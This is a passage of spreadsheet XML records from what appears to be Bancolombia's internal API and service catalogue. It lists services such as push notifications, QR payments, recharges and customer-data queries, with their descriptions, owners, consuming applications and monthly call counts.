    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="AW01065 _x000d__x000a_SUF _x000d__x000a_AFC _x000d__x000a_NU0001 _x000d__x000a_AW1078 _x000d__x000a_AW1110001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-23T17:21:20"/>
    <s v="Push Notifications"/>
    <n v="100"/>
    <s v="Push Notifications - Customer Information"/>
    <n v="100"/>
    <x v="358"/>
    <s v="Notificaciones Push (Push Notifications) hace referencia a los mensajes instantáneos que se entregan al usuario en su teléfono inteligente, por lo cual el usuario dependerá de tener siempre Internet para recibir los mismos. Su proveedor será IBM Cloud.     Esta API tiene como función, permitir a las APPs consumidoras de los servicios de Push, confirmar si un usuario ya está enrolado, desde que APP se enroló y desde que dispositivo. Esto con el fin de poder validar si debe hacerse enrolamiento o cambio de dispositivo."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="APP-PERSONAS_NU0146001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-23T17:21:20"/>
    <s v="Push Notifications"/>
    <n v="100"/>
    <s v="Push Notifications - Customer Management"/>
    <n v="100"/>
    <x v="359"/>
    <s v="Notificaciones Push hace referencia a los mensajes instantáneos que se entregan al usuario en su teléfono inteligente, por lo cual el usuario dependerá de tener siempre Internet para recibir los mismos. Su proveedor será IBM Cloud.     Esta API tiene como función administrar el usuario que acepte enrolarse en el sistema de Notificaciones Push de Bancolombia. Para la administración de estos usuarios, inicialmente se podrá guardar los datos del cliente enrolado en el Gestor de Enví­o y más adelante actualizar las categorí­as que un cliente active o inactive desde las diferentes APPs."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="APP-PERSONAS_NU0146001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <n v="144"/>
    <n v="5801"/>
    <n v="61"/>
    <n v="1456896"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-23T17:21:20"/>
    <s v="Push Notifications"/>
    <n v="100"/>
    <s v="Push Notifications - Send"/>
    <n v="100"/>
    <x v="360"/>
    <s v="Notificaciones Push hace referencia a los mensajes instantáneos que se entregan al usuario en su teléfono inteligente, por lo cual el usuario dependerá de tener siempre Internet para recibir los mismos. Su proveedor será IBM Cloud.     Esta API tiene como función, servir como canal de comunicación con el Gestor de Enví­o. La información necesaria para el enví­o de una notificación Push son el tipo y níºmero de documento y el mensaje."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="APP-PERSONAS_NU0146001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-17T21:32:40"/>
    <s v="QR Code"/>
    <n v="204"/>
    <s v="QR Code - Intention"/>
    <n v="102"/>
    <x v="361"/>
    <s v="Esta API permite generar intenciones de compra y cargarlas en códigos QR Mixtos. Las intenciones de compra son paquetes de información que llevan todos los datos de la compra, como el monto, el identificador íºnico de QR, níºmero de venta o níºmeros de fidelidad. Este paquete de información se actualiza en el código QR para que sea leí­do por el cliente pagador."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="PRAGMA _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ TAXIS SAN JUAN _x000d__x000a_ Zencillo Automatización _x000d__x000a_ A PAGAR V2 _x000d__x000a_ PruebasIntegración _x000d__x000a_ SmartPayment POS EGlobalT _x000d__x000a_ Backend de Taxis Libres App _x000d__x000a_ Propia _x000d__x000a_ BE MOVIL _x000d__x000a_ POS 4.0 _x000d__x000a_ Autocab driver companyon _x000d__x000a_ BAGUER _x000d__x000a_ D y S SAS _x000d__x000a_ PagoCI24 _x000d__x000a_ TAXI TAXI _x000d__x000a_ APP IMPULSADOR _x000d__x000a_ AUTOCAB _x000d__x000a_ RADIO TAXI _x000d__x000a_ AUTOCAB ASISTENTE CONDUCTOR _x000d__x000a_ Tax Andaluz _x000d__x000a_ Payment Gateway controles inteligentes _x000d__x000a_ MOVIVA _x000d__x000a_ Cegid V.2.0 _x000d__x000a_ PTM _x000d__x000a_ zencillo Capturador _x000d__x000a_ TAXIS VERDES _x000d__x000a_ COOPEBOMBASV2"/>
    <n v="3154"/>
    <n v="2677"/>
    <n v="54"/>
    <n v="50"/>
    <n v="787"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-07-08T18:17:51"/>
    <s v="QR Code"/>
    <n v="101"/>
    <s v="QR Code - QR Management"/>
    <n v="101"/>
    <x v="362"/>
    <s v="Capacidad que permite a las aplicaciones de terceros generar un código QR para realizar transferencias. Adicionalmente se notifica la transferencia realizada al contacto de alertas y notificaciones registrado de acuerdo al producto destino de la transferencia."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Soycoopebombas _x000d__x000a_ TAXIA LIFE APP _x000d__x000a_ CONDUCTOR TAX INDIVIDUAL _x000d__x000a_ APP TORO AUTOS _x000d__x000a_ SMART ONE _x000d__x000a_ Mis Aliados _x000d__x000a_ LOS MOVILES _x000d__x000a_ Cegid _x000d__x000a_ MOVIVA _x000d__x000a_ AUTOCAB _x000d__x000a_ TAXIS VERDES _x000d__x000a_ 322 APP _x000d__x000a_ AUTOCAB ASISTENTE CONDUCTOR _x000d__x000a_ TAXI TAXI _x000d__x000a_ RADIO TAXI _x000d__x000a_ A PAGAR"/>
    <n v="6585"/>
    <n v="5885"/>
    <n v="5914"/>
    <n v="6081"/>
    <n v="4798"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-26T18:59:34"/>
    <s v="QR Code"/>
    <n v="204"/>
    <s v="QR Code - QR Management"/>
    <n v="202"/>
    <x v="363"/>
    <s v="Capacidad que permite a las aplicaciones de terceros generar un código QR para realizar transferencias. Adicionalmente se notifica la transferencia realizada al contacto de alertas y notificaciones registrado de acuerdo al producto destino de la transferencia."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="PRAGMA _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ TAXIS SAN JUAN _x000d__x000a_ Zencillo Automatización _x000d__x000a_ A PAGAR V2 _x000d__x000a_ PruebasIntegración _x000d__x000a_ SmartPayment POS EGlobalT _x000d__x000a_ Backend de Taxis Libres App _x000d__x000a_ Propia _x000d__x000a_ BE MOVIL _x000d__x000a_ POS 4.0 _x000d__x000a_ Autocab driver companyon _x000d__x000a_ BAGUER _x000d__x000a_ D y S SAS _x000d__x000a_ PagoCI24 _x000d__x000a_ TAXI TAXI _x000d__x000a_ APP IMPULSADOR _x000d__x000a_ AUTOCAB _x000d__x000a_ RADIO TAXI _x000d__x000a_ AUTOCAB ASISTENTE CONDUCTOR _x000d__x000a_ Tax Andaluz _x000d__x000a_ Payment Gateway controles inteligentes _x000d__x000a_ MOVIVA _x000d__x000a_ Cegid V.2.0 _x000d__x000a_ PTM _x000d__x000a_ zencillo Capturador _x000d__x000a_ TAXIS VERDES _x000d__x000a_ COOPEBOMBASV2"/>
    <n v="165812"/>
    <n v="873013"/>
    <n v="1045252"/>
    <n v="1095967"/>
    <n v="1127387"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-09-18T18:08:45"/>
    <s v="query-customer"/>
    <n v="201"/>
    <s v="Query - Corporate - Customer"/>
    <n v="201"/>
    <x v="364"/>
    <s v="La Api Query - Corporate - Customer permite la consulta de información general, información financiera y la información de contactos, accionistas, grupo económico y miembros de junta de una empresa particular sea persona natural o jurí­dica."/>
    <s v="CLIENTES"/>
    <s v="Clientes Empresas"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <s v="ConsultaInformacionClienteEmpresarial/V1.0"/>
    <m/>
    <s v="PortalConstructor_AW0360004 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="6910"/>
    <n v="5909"/>
    <n v="5276"/>
    <n v="5279"/>
    <n v="6540"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Realizar Operacion Cheque"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio obtendra las diferentes respuestas sobre la Lista de cheques por Oficina y sobre la actualización del estado del cheque una vez sea autorizada la impresión."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <x v="21"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <m/>
    <s v="FINACLE 10.6_CREDITO HIPOTECARIO_AW1010001"/>
    <s v="SCI _x000d__x000a_AW0709001 _x000d__x000a_AW01010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Realizar Operacion Fiduciaria"/>
    <n v="100"/>
    <x v="0"/>
    <s v="REALIZAR OPERACION FIDUCIARIA"/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-11-19T12:28:07"/>
    <s v="Recharges"/>
    <n v="101"/>
    <s v="Recharges-Product Balance"/>
    <n v="101"/>
    <x v="365"/>
    <s v="La API permite realizar la consulta de saldos de las recargas de cualquier producto o servicio en particular, por ejemplo: (Transporte, entretenimiento, telefoní­a)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ ALM_AW0955"/>
    <n v="730176"/>
    <n v="665617"/>
    <n v="635359"/>
    <n v="567594"/>
    <n v="705142"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-03-04T17:58:37"/>
    <s v="Recharges"/>
    <n v="200"/>
    <s v="Recharges-Product Balance"/>
    <n v="200"/>
    <x v="365"/>
    <s v="La API permite realizar la consulta de saldos de las recargas de cualquier producto o servicio en particular, por ejemplo: (Transporte, entretenimiento, telefoní­a)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="730176"/>
    <n v="665617"/>
    <n v="635359"/>
    <n v="567594"/>
    <n v="705142"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-11-19T12:28:07"/>
    <s v="Recharges"/>
    <n v="101"/>
    <s v="Recharges-Recharges Management"/>
    <n v="102"/>
    <x v="366"/>
    <s v="La API Recharges,  permite  realizar y consultar las recargas de servicios (Entretenimiento, servicios píºblicos, telefoní­a móvil, TV) realizadas por los diferentes canales del  banco. Dentro de sus operaciones se encuentran:  1.  POST/recharges Capacidad que  permite crear la recarga de un servicio por los distintos canales que ofrece el Banco al Core de Recargas. 2.  POST/Recharges Capacidad que  permite realizar la consulta del estado de la recarga realizada por el cliente Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ ALM_AW0955"/>
    <n v="710848"/>
    <n v="628700"/>
    <n v="605696"/>
    <n v="538410"/>
    <n v="647424"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-03-04T17:58:37"/>
    <s v="Recharges"/>
    <n v="200"/>
    <s v="Recharges-Recharges Management"/>
    <n v="200"/>
    <x v="366"/>
    <s v="La API Recharges,  permite  realizar y consultar las recargas de servicios (Entretenimiento, servicios píºblicos, telefoní­a móvil, TV) realizadas por los diferentes canales del  banco. Dentro de sus operaciones se encuentran:  1.  POST/recharges Capacidad que  permite crear la recarga de un servicio por los distintos canales que ofrece el Banco al Core de Recargas. 2.  POST/Recharges Capacidad que  permite realizar la consulta del estado de la recarga realizada por el cliente Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="710848"/>
    <n v="628700"/>
    <n v="605696"/>
    <n v="538410"/>
    <n v="647424"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Catalogo_BB2"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El este servicio permite realizar búsqueda de documentos sobre UCM."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Catálogo de Documentos BB2_Catálogo de Documentos BB2_AW0931001"/>
    <s v="AW0922 _x000d__x000a_AW0856 _x000d__x000a_AW0998 _x000d__x000a_NU0142001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Consulta los datos de un cliente en el HUB de Información, con el fin de verificar la existencia del mismo en el banco"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="SAP CRM"/>
    <s v="AW0718001 _x000d__x000a_AW0611001 _x000d__x000a_AW0709001 _x000d__x000a_AW0683001 _x000d__x000a_AW0628001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Comisiones Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permitir consultar la información de las Comisiones de los productos Trade (carta de crédito de importación o garantía standby emitidas) ofrecidas por Bancolombia a un Cliente."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Tesoreria"/>
    <x v="1"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="FINACLE - COLOMBIA_TRADE_AW0684001"/>
    <s v="SVE _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Cuentas Deposito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permite obtener la información de las cuentas de depósito atadas a un número de documento específico."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Datos Cliente"/>
    <n v="310"/>
    <x v="0"/>
    <s v="El servicio posibilita a nuevos consumidores o nuevos componentes la consulta de información de clientes."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="Hub de Información_Entrega de informacion_AW0846001"/>
    <s v="AW1177 _x000d__x000a_AW0937 _x000d__x000a_SAI _x000d__x000a_SU2 _x000d__x000a_AW0856 _x000d__x000a_PAC _x000d__x000a_SCI _x000d__x000a_CNB _x000d__x000a_AW0210001 _x000d__x000a_ALM _x000d__x000a_SVP _x000d__x000a_ALL _x000d__x000a_AW0611001 _x000d__x000a_GDE _x000d__x000a_AW0709001 _x000d__x000a_CDE _x000d__x000a_AW1128 _x000d__x000a_AW01010 _x000d__x000a_APP _x000d__x000a_PSE _x000d__x000a_AW1011 _x000d__x000a_SVE _x000d__x000a_ATM _x000d__x000a_AUD _x000d__x000a_FAC _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Datos Cliente"/>
    <n v="400"/>
    <x v="0"/>
    <s v="El servicio posibilita a nuevos consumidores o nuevos componentes la consulta de información de clientes."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="Hub de Información_Entrega de informacion_AW0846001"/>
    <s v="AW1177 _x000d__x000a_AW0937 _x000d__x000a_ELIBOM _x000d__x000a_SU2 _x000d__x000a_AW0856 _x000d__x000a_AW1294001 _x000d__x000a_AW1097001 _x000d__x000a_AW0210001 _x000d__x000a_SVP _x000d__x000a_GDE _x000d__x000a_AW1287001 _x000d__x000a_AW1287 _x000d__x000a_AW1078 _x000d__x000a_AW1128 _x000d__x000a_APP _x000d__x000a_AW1011 _x000d__x000a_AW1204001 _x000d__x000a_SVE _x000d__x000a_AW0939001 _x000d__x000a_AW0360009 _x000d__x000a_AW1108001 _x000d__x000a_AW1165 _x000d__x000a_AW1203001 _x000d__x000a_AW1272001 _x000d__x000a_AW1285001 _x000d__x000a_AW1302001 _x000d__x000a_NU0004001 _x000d__x000a_TVP _x000d__x000a_AW1249 _x000d__x000a_AW0638 _x000d__x000a_AW1258002 _x000d__x000a_APIC _x000d__x000a_AW1312001 _x000d__x000a_CDT"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Datos Cliente"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio posibilita a nuevos consumidores o nuevos componentes la consulta de información de clientes."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW0718001 _x000d__x000a_AW0683001 _x000d__x000a_AW0227001 _x000d__x000a_AW0628001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Datos Cliente"/>
    <n v="300"/>
    <x v="0"/>
    <s v="El servicio posibilita a nuevos consumidores o nuevos componentes la consulta de información de clientes."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="HUB"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Documentos_BB1"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permite realizar consultas al interior de la plataforma de gestión documental, de tal forma que se obtiene el enlace en donde se pueden visualizar las imágenes de los documentos previamente almacenados."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Consulta de Documentos BB1 V2_AW1216001"/>
    <s v="AW1177 _x000d__x000a_AW0922 _x000d__x000a_AW0856 _x000d__x000a_AW1182 _x000d__x000a_AW0611001 _x000d__x000a_AW1128 _x000d__x000a_AW0659"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Filiales"/>
    <n v="100"/>
    <x v="0"/>
    <s v="se consulta en el HUB de Información los datos respectivos de un tipo y número de identificación para recuperar las filiales de un Cliente."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="HUB"/>
    <s v="AW0718001 _x000d__x000a_AW0227001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Id Cliente"/>
    <n v="300"/>
    <x v="0"/>
    <s v="Realiza consultas por documentos de identificación y IDs de aplicaciones de clientes para obtener las llaves que se requieran de los datos maestros del HUB de información DMR"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="HUB"/>
    <s v="AW0718001 _x000d__x000a_AW0504001 _x000d__x000a_AW0227001 _x000d__x000a_AW0628001 _x000d__x000a_AW0682001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Producto"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Realizar la consulta de los productos que un cliente tiene como titular"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="HUB"/>
    <s v="APIC _x000d__x000a_AW0718001 _x000d__x000a_AW0227001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Tasa Cambio"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio le proporciona al consumidor el valor de una tasa de cambio dado la moneda origen y destino y la fecha de tasa a consultar."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="HUB"/>
    <s v="AW0718001 _x000d__x000a_AW0227001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-07-07T21:35:05"/>
    <s v="Reference Data Management"/>
    <n v="100"/>
    <s v="Reference Data Management - Master Catalogue"/>
    <n v="100"/>
    <x v="367"/>
    <s v="API que permite consultar los catálogos de valores de los distintos atributos de los datos de información de cliente. Conteniendo la llave-valor de los códigos y descripciones de los maestros del banco para catalogo personas. (Ejemplo: Cargos, Profesiones del cliente, Segmentos, Tipos de documento, entre otros)."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaCatalogoMaestros/V1.0"/>
    <m/>
    <s v="creditlens_NU0038001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ ChannelManagement_D2B_NU0051001 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ ChannelManagement_NU0051001 _x000d__x000a_ Galatea_NU0051001"/>
    <n v="85642"/>
    <n v="105869"/>
    <n v="87381"/>
    <n v="61199"/>
    <n v="53838"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Regenerar Clave SVE"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Permitir generar las claves de los usuarios que interactúan en la Empresa con el producto a través de la Sucursal Virtual, mejorando el servicio cliente en forma segura."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Registrar Sesion Usuario"/>
    <n v="100"/>
    <x v="0"/>
    <s v="servicio utilizado en el proyecto de transformación digital para la consulta de información de sesión "/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Registro Usuario Validacion Biometrica"/>
    <n v="100"/>
    <x v="0"/>
    <s v="A través de este servicio se van a registrar en Biovoz los usuarios creados en el Directorio Activo Host to Host para la Unidad Organizativa de Sufi en la cual van a estar matriculados los vendedores de los comercios afiliados y usuarios internos que harán uso de la aplicación ConSufi."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="APP-Sufi_AW1209001"/>
    <s v="TP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-22T02:16:18"/>
    <s v="Regulatory Compliance"/>
    <n v="102"/>
    <s v="Regulatory Compliance - Risk Rating Management SCOVIC"/>
    <n v="102"/>
    <x v="368"/>
    <s v="Administra la ejecución de los modelos de riesgos SARLAFT,  busca crear un nuevo componente tecnológico (SCOVIC) que administre las reglas de negocio para entregar los diferentes niveles de calificación para los diferentes modelos de vinculación desde los diferentes canales o aplicaciones."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <m/>
    <s v="SAPCRM_AW0611001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ APM_AW0388001 _x000d__x000a_ ComponenteAdaptadorNequi_NU0163001"/>
    <n v="3620954"/>
    <n v="3153679"/>
    <n v="3111027"/>
    <n v="2976609"/>
    <n v="3103102"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-12-09T16:34:33"/>
    <s v="Sales Product Agreement"/>
    <n v="101"/>
    <s v="Sales Product Agreement - Product Information"/>
    <n v="101"/>
    <x v="369"/>
